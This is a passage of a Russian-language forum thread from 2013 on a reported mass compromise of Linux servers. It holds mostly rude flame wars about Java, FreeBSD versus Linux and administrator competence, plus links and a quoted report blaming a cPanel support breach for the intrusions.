> Э нет. Как раз некий опыт подсказывает мне что выбор ЯП довольно
> много говорит об авторе. И если это java - это или
> энтерпрайзные быдлокодеры, или какие-то скрипткидисы типа изена. В данном случае наиболее
> вероятно именно второе.

детонька, а сколько "энторпрайзных быдлокодеров" ты знаешь лично? у вас там среди коллег-токарей и такие есть? что-то сомневаюсь.
>> я вот жаву не знаю и мне, например, очевидно, что тот код делает.
> Да не, дело то не в том. Разобраться в этом коде и
> я могу, хоть и не знаю жавы. Но вот ожидать слишком
> многого от того кто такое пишет на жаве - это как
> правило большая ошибка. Что можно ожидать от типичного програмера на яве
> - прекрасно видно на примере изена.

и только Специалист294 знающий ааааще всьо не смог догадаться, откуда я тот говнокод выцепил. попробуй поспрошать знакомых "энторпрайзных быдлокодеров" каким образом оно могло у меня оказаться, и, главное, почему жава. (хинт: нет, это не я писал тот чудо код).

Ответить | Правка | ^ к родителю #571 | Наверх | Cообщить модератору

637. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 14:35 
> не умеет детектить;)

Да детекти наздоровье. Могу же я покушать немного, раз тут хорошо кормят, а? :)

> сказал Счастливый Обладатель никЫя n900 (?). ты его еще не спустил в yнитаз от горя-то?;)

Это прекрасная машинка, которая сильно упрощает мне жизнь. Обеспечивая шифрованный впн, так что можно без стрема использовать открытый вайфай где попало, навигацию на краю земли, возможность сервером порулить в чистом поле, автоматизировать какие либо действия, ... . Ну и вообще - хорошо когда в кармане настоящий маленький компьютер с пингвином, что ни говори. Но да, в одном ты прав: я счастлив что у меня есть этот девайс.

> детонька, а сколько "энторпрайзных быдлoкодеров" ты знаешь лично?

Вот что-что а на это "счастье" я насмотрелся. Вплоть до индивидов которые сами base64 декодер написать не могут. Знаю несколько десятков, наверное. А что?

> у вас там среди коллег-токарей и такие есть? что-то сомневаюсь.

Вот к сожалению токарей знакомых у меня нет :(. О чем несколько раз приходилось сожалеть.

> и только Специалист294 знающий ааааще всьо не смог догадаться,

Если честно, я даже и не пытался. Ява-крап настолько меня не интересует, что у меня его нет и не будет. Это так сложно понять?

> откуда я тот гoвнокод выцепил. попробуй поспрошать знакомых
> "энторпрайзных быдлокодеров" каким образом оно могло у меня оказаться, и,
> главное, почему жава. (хинт: нет, это не я писал тот чудо код).

Слушай, как тебе еще популярнее объяснить что мне неинтересен ява-крап? И с быдлокодерами на яве я не испытываю желания общаться лишний раз. Не люблю туповатых персонажей. Правда просто? :)

Ответить | Правка | ^ к родителю #576 | Наверх | Cообщить модератору

639. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 21-Фев-13, 14:46 
> И с быдлокодерами на яве я не испытываю желания общаться лишний раз. Не
> люблю туповатых персонажей. Правда просто? :)

ну как бы это сказать.. даже те ява-говнокодеры которые мне встречались, поумнее тебя будут, по наблюдениям. но ты "кушай" ага. всегда ж выгоднее прикрыть якобы троллингом свою тупость;)


Ответить | Правка | ^ к родителю #637 | Наверх | Cообщить модератору

657. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 17:22 
> прикрыть якобы троллингом свою тупость;)

Ишь какой забавный батхерт :). Ты как школьник на уроке не сделавший домашку. Слушай, а ты никогда не думал что мне попросту положить на твое мнение о моей персоне? Ты не такой уж и пуп земли, чтобы я надрывался тебе что-то доказывать, если ты вдруг этого еще не понял :)

Ответить | Правка | ^ к родителю #639 | Наверх | Cообщить модератору

382. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:38 
... как и попытку использовать бзде для десктопных задач, да?
Ответить | Правка | ^ к родителю #372 | Наверх | Cообщить модератору

385. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 19-Фев-13, 21:46 
> ... как и попытку использовать бзде для десктопных задач, да?

а можно узнать, что такое "десктопных задач" ?

Ответить | Правка | ^ к родителю #382 | Наверх | Cообщить модератору

435. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 03:01 
> лет 6 назад наблюдал за активностью 1 смешной зверюшки, через дырку в
> 1 пхп-щной хреньки залезла и пыталась wget`ом чего-то качать. тогда я
> ржал громко. а щас попытки луноходов запустить на фре wget, bash
> и mc уже даже улыбку не вызывают.

В арче в базовой системе и вообще, без доставки по требованию, нет wget. Это раз.

У меня на фре был и wget, и bash, и mc. Это два.

И третье, самое главное: люди, которые считают, что linux * это плохая свободная ОС, и постоянно ищут её недостатки, а freebsd это хорошая свободная ос и постоянно ищут её достоинства - сотворили себе кумира. тельца для поклонения. со всеми соответствующими. Это такие же больные люди, как и те, которые считают, что "Спартак" это хорошо, а "Динамо" это плохо.

Я категорически против linux-центризма, но freebsd-центризм имеет гораздо меньше права на жизнь.


Когда кто-то найдёт способ всех вот таких снобов-центристов с помощью какого-нибудь психологического трюка с гневом покинуть сообщество - будет самым замечательным в истории этого самого сообщества. Когда вместо ежедневных раздоров там будет ежедневное взаимодействие, когда сообщество будет защищено от внешних и внутренних врагов - тогда оно будет работать в полную силу, с запредельным КПД. А пока кто-то ставит freebsd для того, чтобы самоутверждаться за счёт других - я не думаю, что это свободный человек. Это враг другим людям, он только и делает, что мешает.

Ответить | Правка | ^ к родителю #372 | Наверх | Cообщить модератору

463. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 20-Фев-13, 10:15 
> У меня на фре был и wget, и bash, и mc. Это
> два.

ну значит в твоем случае у тупого скрипта получилось бы шелл влить (я про wget), он, собственно, и не нужен по большому счету, на фре, но его ставят такие вот товарищи :)

> И третье, самое главное: люди, которые считают, что linux * это плохая
> свободная ОС, и постоянно ищут её недостатки, а freebsd это хорошая
> свободная ос и постоянно ищут её достоинства - сотворили себе кумира.
> тельца для поклонения. со всеми соответствующими. Это такие же больные люди,
> как и те, которые считают, что "Спартак" это хорошо, а "Динамо"
> это плохо.

тебя снова накрыло?
чтобы сразу расставить все на свои места:
1) футбол - говно и бесполезная трата времени, наблюдать как куча имбицилов гоняется за мячиком. и не важно, спартак там или динамо.
2) недостатки в линуксе (как и во фре) ищут только больные на голову, остальным и так видно, что они есть.
> Я категорически против linux-центризма, но freebsd-центризм имеет гораздо меньше права
> на жизнь.

гыгы. а из чего следует, что "имеет гораздо меньше права на жизнь"?;-) IMO они одинаково не имеют. да, я ставить фрю стараюсь везде, чтобы проще было обслуживать, но это не означает, что у меня есть только она.

> Когда кто-то найдёт способ всех вот таких снобов-центристов с помощью какого-нибудь психологического
> трюка с гневом покинуть сообщество - будет самым замечательным в истории
> этого самого сообщества. Когда вместо ежедневных раздоров там будет ежедневное взаимодействие,
> когда сообщество будет защищено от внешних и внутренних врагов - тогда
> оно будет работать в полную силу, с запредельным КПД. А пока

а пока есть 100500 дистрибутивов линукса их 17-21 летние "поклонники" будут поливать говном друг-дружку. (странно, еще никто из них не успел отметиться типа "Сервер на арче?! лол"). не будет bsd систем - срачики-то не прекратятся. пора бы тебе это понять, не маленький ж уже, поди.
> кто-то ставит freebsd для того, чтобы самоутверждаться за счёт других -
> я не думаю, что это свободный человек. Это враг другим людям,
> он только и делает, что мешает.

т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду пользователей виндовс, например. что изменилось?;-)

Ответить | Правка | ^ к родителю #435 | Наверх | Cообщить модератору

465. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 10:30 
> т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
> а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду
> пользователей виндовс, например. что изменилось?;-)

Пользователей windows на опеннете вообще быть не должно, потому что им это всё не особо интересно. Да и нельзя одновременно дуть в дудочку windows и собирать в кувшинчик floss.

А то, что конкретные личности ведут себя по описанному - это не из-за осей. Осями они только прикрываются.

Ответить | Правка | ^ к родителю #463 | Наверх | Cообщить модератору

467. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 20-Фев-13, 10:37 
>> т.е. ты намекаешь на то, что поставивший fbsd круче "других"?:-)
>> а попробуй в своей фразе сделать s/freebsd/ubuntu/ и под "других" иметь ввиду
>> пользователей виндовс, например. что изменилось?;-)
> Пользователей windows на опеннете вообще быть не должно, потому что им это
> всё не особо интересно. Да и нельзя одновременно дуть в дудочку
> windows и собирать в кувшинчик floss.

предложи по user-agent их не пускать, хотябы:) ну и да, много таких, которые putty.exe. я правда не знаю ниодного, не тупого чтобы.
> А то, что конкретные личности ведут себя по описанному - это не
> из-за осей. Осями они только прикрываются.

какой жестокий мир нас окружает!

Ответить | Правка | ^ к родителю #465 | Наверх | Cообщить модератору

468. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 10:44 
> какой жестокий мир нас окружает!

Не жестокий мир, а слабохарактерные люди. Которых этот жестокий мир обидел, и которые готовы по этому поводу выместить зло на первом встречном. Они думают, что это признак крутости, а это признак слабости.

Ответить | Правка | ^ к родителю #467 | Наверх | Cообщить модератору

638. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 14:38 
Даже буратина дело говорит. Вон тут этот, который RIP - характерный персонаж. Ну да, его жизнь поимела, с ораколм на пару, загнобив любимую соляру. Но виноват в этом конечно же линукс, ога.
Ответить | Правка | ^ к родителю #468 | Наверх | Cообщить модератору

641. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 21-Фев-13, 14:52 
> Даже буратина дело говорит.

И слово делает. И вообще, поздно пить Боржоми, когда есть Буратино.

Ответить | Правка | ^ к родителю #638 | Наверх | Cообщить модератору

380. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 21:37 
Не, то что сдал - малацца, сознательный тип. А вот то что у него на серверах водится зоопарк живности - таки говорит о нем как об админе с наихучшей стороны. Все-таки хороший админ должен не допускать поимения, а не технично подтирать зад после того как обделался.
Ответить | Правка | ^ к родителю #351 | Наверх | Cообщить модератору

397. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от рост on 19-Фев-13, 22:06 
> http://juick.com/blacklion/2240395
> Народ должен знать своих героев. :-)

по ссылке - ни скриптов, ни исходников троянцев. ничего.
такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то внимание.

Ответить | Правка | ^ к родителю #302 | Наверх | Cообщить модератору

404. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 22:26 
> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе
> какое-то внимание.

Теперь мы знаем что он лох и у него 6 троянов на серваке было. Как репортеру аверам - зачет. Как админу - факофф, гнать таких админов. С волчьим билетом. Пусть идет к аверам работать, заразу разыскивать. Может быть это у него лучше чем администрежка будет получаться.

Ответить | Правка | ^ к родителю #397 | Наверх | Cообщить модератору

406. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 19-Фев-13, 22:34 
>> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе
>> какое-то внимание.
> Теперь мы знаем что он лох и у него 6 троянов на
> серваке было. Как репортеру аверам - зачет. Как админу - факофф,
> гнать таких админов. С волчьим билетом. Пусть идет к аверам работать,
> заразу разыскивать. Может быть это у него лучше чем администрежка будет
> получаться.

и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)
небольшая подсказка: есть хосты, которые торчат в интернеты, на хостах крутится некое ПО, в котором время от времени находят дырки, иногда афтары ПО о них узнают сильно позже, нежели их начинают юзать плохие дяди.
а в билет себе отметку всеже сделай, да. а то мало ли, еще возьмут куда админить чего.

Ответить | Правка | ^ к родителю #404 | Наверх | Cообщить модератору

572. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 21:55 
> и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)

Ну как бы на месте админа довольно странно гордиться тем что у него на сервере зоопарк малвари крутится. С моей колокольни, компетенция такого админа оставляет желать, да. Что-то типа виндузятника который пачками вирусы из системы вытаскивает и радуется тому что на его древнем win98 половина вирусов уже не работает, т.к. видите ли ожидает более современную ОС.

> небольшая подсказка: есть хосты, которые торчат в интернеты, на хостах крутится некое
> ПО, в котором время от времени находят дырки, иногда афтары ПО
> о них узнают сильно позже, нежели их начинают юзать плохие дяди.

А хороший админ
1) Оперативно ставит патчи.
2) Мониторит что происходит на его серверах. При том не когда там уже 6 троянов.
3) Старается не пользоваться софтом с кучей дыр где не оперативно втыкают патчи.
4) Принимает меры к защите от поимения даже есди остальное не помогло. Как то настраивает фаеры, контейнеры/виртуалки, затягивает права и прочая.

> а в билет себе отметку всеже сделай, да.

В какой еще билет? Как максимум у меня есть билет на поезд. Но зачем там отметки об админах? :)

Ответить | Правка | ^ к родителю #406 | Наверх | Cообщить модератору

578. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 20-Фев-13, 22:59 
>> и только одмин локалхоста ЗоЩиЩоН надежноТМ. и, главное, с администрежкой у него все ок;-)
> Ну как бы на месте админа довольно странно гордиться тем что у
> него на сервере зоопарк малвари крутится. С моей колокольни, компетенция такого

_пытается_ крутиться. а про твою колокольню пиши еще, улыбает.
> админа оставляет желать, да. Что-то типа виндузятника который пачками вирусы из
> системы вытаскивает и радуется тому что на его древнем win98 половина
> вирусов уже не работает, т.к. видите ли ожидает более современную ОС.

отсутствие wget (например) в системе = менее современная ОС. ок, попробую запомнить.
> А хороший админ

0) админит что-то кроме localhost и понял то, о чем я написал выше. проходи мимо.
> В какой еще билет? Как максимум у меня есть билет на поезд.
> Но зачем там отметки об админах? :)

юмор тоже какой-то специфический у тебя.

Ответить | Правка | ^ к родителю #572 | Наверх | Cообщить модератору

640. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 14:51 
> _пытается_ крутиться.

Ну, как бы, security breach засчитан. А то что одна кривизна не заработала на другой кривизне т.к. кривульки радиусами кривизны не сошлись - так это так, сугубо везение, а не чья-то заслуга. Ж@порукость вообще заслугой быть не может по определению.

> а про твою колокольню пиши еще, улыбает.

Ну я думаю что в данном случае очень многие согласятся в оценке качества работы такого админа. Если он такими пачками малвару выколупывает с своих серверов - хороший админ, чо :).

>> вирусов уже не работает, т.к. видите ли ожидает более современную ОС.
> отсутствие wget (например) в системе = менее современная ОС. ок, попробую запомнить.

Не, в данном случае это таки быдлокодинг чистой воды. Потому что он и в линуксе как-то никому в общем то не обязан присутствовать в обязательном порядке. А приколись, я видел линуксы где его нет. Да, быдлокодерские сплойты - хорошее дополнение к быдлоадмину с 6 троянами на серванте. Дурак дурака - видит издалека. Почему вот у меня нет никаких либкейутилсов? И вообще, никакой левой активности. Прямо скучно даже - даже у крютых бздоидов по 6 троянов за раз, а у меня на дырявом линуксе, да еще убунтовых к тому же - тишь да гладь. Вот что я делаю не так? :)

> 0) админит что-то кроме localhost и понял то, о чем я написал выше. проходи мимо.

Ну вот я админю что-то кроме локалхоста. Но что-то не вижу левой активности. Ни работающих троянов, ни пытающихся работать. Даже скучно, блин. Тут такой цирк, кирпичи валятся (правда больше всех их генерят не линуксоиды, как обычно), кого-то хакают. Но почему-то мне ничего не досталось :(.

Ответить | Правка | ^ к родителю #578 | Наверх | Cообщить модератору

405. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от тигар (ok) on 19-Фев-13, 22:29 
>> http://juick.com/blacklion/2240395
>> Народ должен знать своих героев. :-)
> по ссылке - ни скриптов, ни исходников троянцев. ничего.
> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то
> внимание.

йунаша, ну попробуй уже научиться пользоваться поисковыми системами не только для поиска прона да "настроить someshit на ubuntu".
чем еще "админушка" помимо lev@freebsd.org отличился пускай будет тебе дом. заданием.

Ответить | Правка | ^ к родителю #397 | Наверх | Cообщить модератору

482. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от прохожий on 20-Фев-13, 13:01 
>>> http://juick.com/blacklion/2240395
>>> Народ должен знать своих героев. :-)
>> по ссылке - ни скриптов, ни исходников троянцев. ничего.
>> такое чувство, что очередной админушка придумал кул-стори, чтобы привлечь к себе какое-то
>> внимание.
> йунаша, ну попробуй уже научиться пользоваться поисковыми системами не только для поиска
> прона да "настроить someshit на ubuntu".
> чем еще "админушка" помимо lev@freebsd.org отличился пускай будет тебе дом. заданием.

собственно история о троянах была получена чуть чуть другим путем - и только тут увидел ссылку на блог.
мир адекватных людей похоже очень тесен :-)

Ответить | Правка | ^ к родителю #405 | Наверх | Cообщить модератору

485. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от тигар (ok) on 20-Фев-13, 13:09 
> собственно история о троянах была получена чуть чуть другим путем - и
> только тут увидел ссылку на блог.
> мир адекватных людей похоже очень тесен :-)

собственно, ты бы мог и ограничиться тем_самым_каналом в ирц. а так, смотри сколько сотен набрал комментов :)

Ответить | Правка | ^ к родителю #482 | Наверх | Cообщить модератору

4. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от emg81 (ok) on 19-Фев-13, 14:04 
со всеми ОС такое бывает, я так думаю.
но, тем не менее, повод призадуматься имеется
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от б.б. on 19-Фев-13, 14:24 
Проприетарщики как обычно, не смогли под несколько платформ собрать. Нет бы открыть исходники...
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

275. "И как нельзя КСТАТИ"  +6 +/
Сообщение от Sergey (??) on 19-Фев-13, 18:35 
И как-то само-собой вспоминается обсуждаемый пару лет назад на Хабре маунал от Пентагоновоцев как правильно настраивать и админить дистр на основе RH. Еще тогда стебались что это руководство с сомнительными настройками - и вот, под прицелом именно RH, в то время как он вроде корпоративненьий. А про Debian веточки то как раз неслышно.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

483. "И как нельзя КСТАТИ"  +/
Сообщение от прохожий on 20-Фев-13, 13:05 
> И как-то само-собой вспоминается обсуждаемый пару лет назад на Хабре маунал от
> Пентагоновоцев как правильно настраивать и админить дистр на основе RH. Еще
> тогда стебались что это руководство с сомнительными настройками - и вот,
> под прицелом именно RH, в то время как он вроде корпоративненьий.
> А про Debian веточки то как раз неслышно.

похоже эпидемия не ограничивается RH.

http://www.webhostingtalk.com/showpost.php?p=8565861&postcou...

Looks like it's not only centos specific...

Debian Squeeze w/ Xen 4.0

Ответить | Правка | ^ к родителю #275 | Наверх | Cообщить модератору

484. "И как нельзя КСТАТИ"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 13:09 
> похоже эпидемия не ограничивается RH.

Похоже, эпидемия как раз ограничивается этим вебхостингтолк...

Есть какая-то ощутимая информация?

Ответить | Правка | ^ к родителю #483 | Наверх | Cообщить модератору

487. "И как нельзя КСТАТИ"  +1 +/
Сообщение от прохожий on 20-Фев-13, 13:17 
если я скажу - что лично видел взломы клиентов - этого хватит ?
если это подтвердят люди из бывшего ASPLinux / BlackCat linux (в частности основатели) - достаточно ?

Остальное - верить или нет - ваше право.
просто webhosting talks - весьма известная площадка для общения хостеров.

Ответить | Правка | ^ к родителю #484 | Наверх | Cообщить модератору

489. "И как нельзя КСТАТИ"  +1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 13:19 
> если я скажу - что лично видел взломы клиентов - этого хватит?

Для чистосердечного признания - думаю, да.

Ответить | Правка | ^ к родителю #487 | Наверх | Cообщить модератору

493. "И как нельзя КСТАТИ"  +1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 13:28 
>> если я скажу - что лично видел взломы клиентов - этого хватит?
> Для чистосердечного признания - думаю, да.

а для подтверждения правдивости информации ?:)

тут тоже врут.. один ты весь в белом и правдивый :)

http://www.linuxquestions.org/questions/blog/unspawn-2450/si.../

Не позорился бы уж буратинка.. такой же деревянный.

http://forum.directadmin.com/showthread.php?t=45745
http://blog.configserver.com/index.php?itemid=716
и тп..
форумы plesk, cpannel и тп.

Ответить | Правка | ^ к родителю #489 | Наверх | Cообщить модератору
Часть нити удалена модератором

502. "И как нельзя КСТАТИ"  +/
Сообщение от linux must _RIP_ on 20-Фев-13, 13:55 
>> Вам так столман сказал ?
> Ну назовите хоть одну причину, почему стоит верить вашим соплям?

Моим не стоит - но стоит глянуть на официальные сайты Plesk, cPannel, DirectAdmin, CloudLinux, ....
и посмотреть на уведомления там.

А верить или не верить - это уже ваше дело :-)

Ответить | Правка | ^ к родителю #578 | Наверх | Cообщить модератору

642. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 14:52 
> тут тоже врут.. один ты весь в белом и правдивый :)

Ну вы то с вашим ником - просто образец непредвзятости и все такое.

Ответить | Правка | ^ к родителю #493 | Наверх | Cообщить модератору

495. "И как нельзя КСТАТИ"  –1 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 13:34 
http://stackoverflow.com/questions/14164552/keyctl-commands-...

так что не только RHEL 6 clones.

centos 5.8 also.

а бедному буратине - нужно быть не столь деревянным - а научиться пользоваться любимым поисковиком, что видимо ему западло - ибо настоящие пацаны так не делают. Они по ссылкам не ходят, и верят только своим кумирам типа Столмана - если он сказал что дети не нужны, значит детей на дно озера с камушком - что бы не всплыли.

Ответить | Правка | ^ к родителю #483 | Наверх | Cообщить модератору
Часть нити удалена модератором

500. "И как нельзя КСТАТИ"  +/
Сообщение от linux must _RIP_ on 20-Фев-13, 13:50 
>> и верят только своим кумирам типа Столмана
> Оснований верить Столлману примерно в 15 млн. раз больше, чем верить ссылкам.
> Но если для кого-то святое "нашёл по ссылке" является истиной, то
> ему уже никакой Столлман не поможет.
> Но как тогда назвать тех, которые приходят дрочить на тех, кто слушает
> Столлмана. Латентные столлманофилы? Люди со смещённой сексуальной ориентацией?

святое - это стопка тикетов в службе поддержки.  Но этого я показать не могу :-)И официальные сообщения на сайтах панелей тоже видимо не правда.
А вы дальше можете верить чему вам хочется. Это так смешно :-)

Ответить | Правка | ^ к родителю #487 | Наверх | Cообщить модератору

737. "И как нельзя КСТАТИ"  +/
Сообщение от Michael Shigorin email(ok) on 22-Мрт-13, 20:49 
> святое - это стопка тикетов в службе поддержки.

А буратино-то был ближе к истине, чем втикетызрящий:

---
Вот ветка форума, где обсуждался этот руткит:

  http://www.webhostingtalk.com/showthread.php?t=1235797&page=84

Как раз на этой странице появились сообщения, что компания cPanel
признала факт взлома их серверов, использовавшихся отделом техподдержки,
а в базах там лежало множество паролей, предоставленных клиентами cPanel
для доступа техподдержки к их серверам; так что для последующего
внедрения руткитов на эти сервера не потребовалось искать там
уязвимости.  Кроме того, в некоторых случаях обнаруживали вредоносное
ПО, похищающее пароли, на компьютерах с Windows, использовавшихся для
администрирования серверов, где впоследствии был обнаружен руткит.
--- http://lists.altlinux.org/pipermail/smoke-room/2013-March/06...

Ответить | Правка | ^ к родителю #500 | Наверх | Cообщить модератору

739. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Dvorkin email(??) on 25-Мрт-13, 08:02 
> А буратино-то был ближе к истине, чем втикетызрящий:

и я :) http://www.opennet.dev/cgi-bin/openforum/vsluhboard.cgi?quote...

Ответить | Правка | ^ к родителю #737 | Наверх | Cообщить модератору

740. "И как нельзя КСТАТИ"  +/
Сообщение от AlexAT (ok) on 26-Мрт-13, 07:16 
>> А буратино-то был ближе к истине, чем втикетызрящий:
> и я :) http://www.opennet.dev/cgi-bin/openforum/vsluhboard.cgi?quote...

Да, мне кажется, все более-менее вменяемые сразу показали пальцем на быдлопанели и Windows...

Ответить | Правка | ^ к родителю #739 | Наверх | Cообщить модератору

529. "И как нельзя КСТАТИ"  +/
Сообщение от Michael Shigorin email(ok) on 20-Фев-13, 15:44 
> а бедному буратине

Ковбои, остыньте.

Ответить | Правка | ^ к родителю #495 | Наверх | Cообщить модератору

530. "И как нельзя КСТАТИ"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 15:53 
>> а бедному буратине
> Ковбои, остыньте.

Вы думаете, я несправедлив к этому бедному рыцарю? А мне кажется, что подобных трудных товарищей нужно занимать каким-то полезным делом. :) Или просто удалять. Потому что они шпарят без разбору, по трафарету, своим спамом мешая разглядеть что-либо интересное и полезное. И смущают детей и женщин.

Очень надоело уже погружаться на это дно.

ps. nz.51t.ru/Иуд.1:23 nz.51t.ru/1Тим.1:18-20

Ответить | Правка | ^ к родителю #529 | Наверх | Cообщить модератору

531. "И как нельзя КСТАТИ"  –1 +/
Сообщение от Michael Shigorin email(ok) on 20-Фев-13, 15:59 
>>> а бедному буратине
>> Ковбои, остыньте.
> Вы думаете, я несправедлив к этому бедному рыцарю? А мне кажется, что
> подобных трудных товарищей нужно занимать каким-то полезным делом. :)

В данном случае несправедливы -- лучше знать о недостатках, чем о достоинствах.  Тем более о критичных проблемах.  И вовремя.

Вспомните первую ремотную дырку в OpenBSD и подумайте, как это касалось админов практически всех *NIX-like и насколько важно было получить по возможности точную, полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.

Ответить | Правка | ^ к родителю #530 | Наверх | Cообщить модератору

532. "И как нельзя КСТАТИ"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 16:08 
> В данном случае несправедливы -- лучше знать о недостатках, чем о достоинствах.
>  Тем более о критичных проблемах.  И вовремя.

Лучше. Но подобной информации нет, все следы какие-то фантомные. Если есть уязвимость - то её встретят и устранят. Если это очередной windows-троян, то тоже в итоге можно будет его поймать. За время ожидания так ничего значимого и не произошло.

Но речь то не об этом. Человек скачет с одного на другое, упивается чужими проблемами, и несёт галиматью с умным видом, неоднократно. Когда то, что я не просил, мне пишут 500 раз, это называется спам. И, если его не фильтровать, в нём можно утонуть.


> Вспомните первую ремотную дырку в OpenBSD и подумайте, как это касалось админов
> практически всех *NIX-like и насколько важно было получить по возможности точную,
> полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.

Как будто ужимки и прыжки тех, кто тут ужимается и прыгает, хоть как-то может приблизить к полной и актуальной информацией. Мне кажется, что без них разбираться в проблеме будет гораздо проще, а информация будет гораздо актуальнее.


Нет, я вполне допускаю, что я неправ, или даже сильно неправ. Но я понять не могу, какую пользу, кроме вреда, может нести чужой бездумный спам, в котором набор букв слабо коррелирует с текущей ситуацией. Мне только одно изречение про git явно сказало, что человеку дали задание говорить, а что именно говорить - не сказали. А уж кто ему его дал - тараканы в голове или пропаганда любви к мальчикам на форумах ...

Ответить | Правка | ^ к родителю #531 | Наверх | Cообщить модератору

534. "И как нельзя КСТАТИ"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 16:12 
> полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.

И ещё - если не будет провокаций, то человека вежливее и милее меня вы даже не найдёте. :)

Но здесь вежливое общение скорее потакает этим людям, и только провоцирует их на большее зло, и делает этих людей хуже и несчастнее.

Человек должен осознавать ОТВЕТСТВЕННОСТЬ за свои поступки, и доносить ему это лучше всего тем способом, который он понимает.


Ответить | Правка | ^ к родителю #531 | Наверх | Cообщить модератору
Часть нити удалена модератором

547. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Crazy Alex (ok) on 20-Фев-13, 19:11 
Вообще говоря, таким как ты не надо хамить. Тебя надо просто банить. Но раз администрация добрая - обходимся теми средствами, что есть.
Ответить | Правка | ^ к родителю #740 | Наверх | Cообщить модератору

551. "И как нельзя КСТАТИ"  –2 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 19:32 
> Вообще говоря, таким как ты не надо хамить. Тебя надо просто банить.
> Но раз администрация добрая - обходимся теми средствами, что есть.

как самокритично о себе.. заметте - хамить начали первые вы. а вас почему-то не забанили.
Администрация явно добрая.

Ответить | Правка | ^ к родителю #547 | Наверх | Cообщить модератору

557. "И как нельзя КСТАТИ"  +2 +/
Сообщение от Michael Shigorin email(ok) on 20-Фев-13, 20:25 
> как самокритично о себе..

Коллеги, кто мудрей -- тот пусть остановится первым.

Ответить | Правка | ^ к родителю #551 | Наверх | Cообщить модератору

609. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Led (ok) on 21-Фев-13, 03:34 
>> как самокритично о себе..
> Коллеги, кто мудрей -- тот пусть остановится первым.

Может просто всем уйти отсюда, потому что M$-хомячки теперь тут главные? Ну так объявите официально: "OpenNet - ресурс для обсирания OpenSource" - будет юридически оформлено то, что по факту и есть. Потому как так, как обсирают (при чём в 99% - явная ложь) здесь, неосирают нигде, даже на microsoft.com.
Ты думаешь интересно прбираться здесь сквозь испражнения M$-дибилов?

Ответить | Правка | ^ к родителю #557 | Наверх | Cообщить модератору

658. "И как нельзя КСТАТИ"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 17:30 
> Коллеги, кто мудрей -- тот пусть остановится первым.

Извините, а модераторские обязанности вы выполнять не планируете? А то разглагольствовать про какой-то там пастинор (тут вроде не медфорум?) - это пожалуйста. А вот потереть хамоватые и откровенно провокативные сообщения от граждан с наездливыми никами - не пора ли уже?

Ответить | Правка | ^ к родителю #557 | Наверх | Cообщить модератору

725. "И как нельзя КСТАТИ"  +/
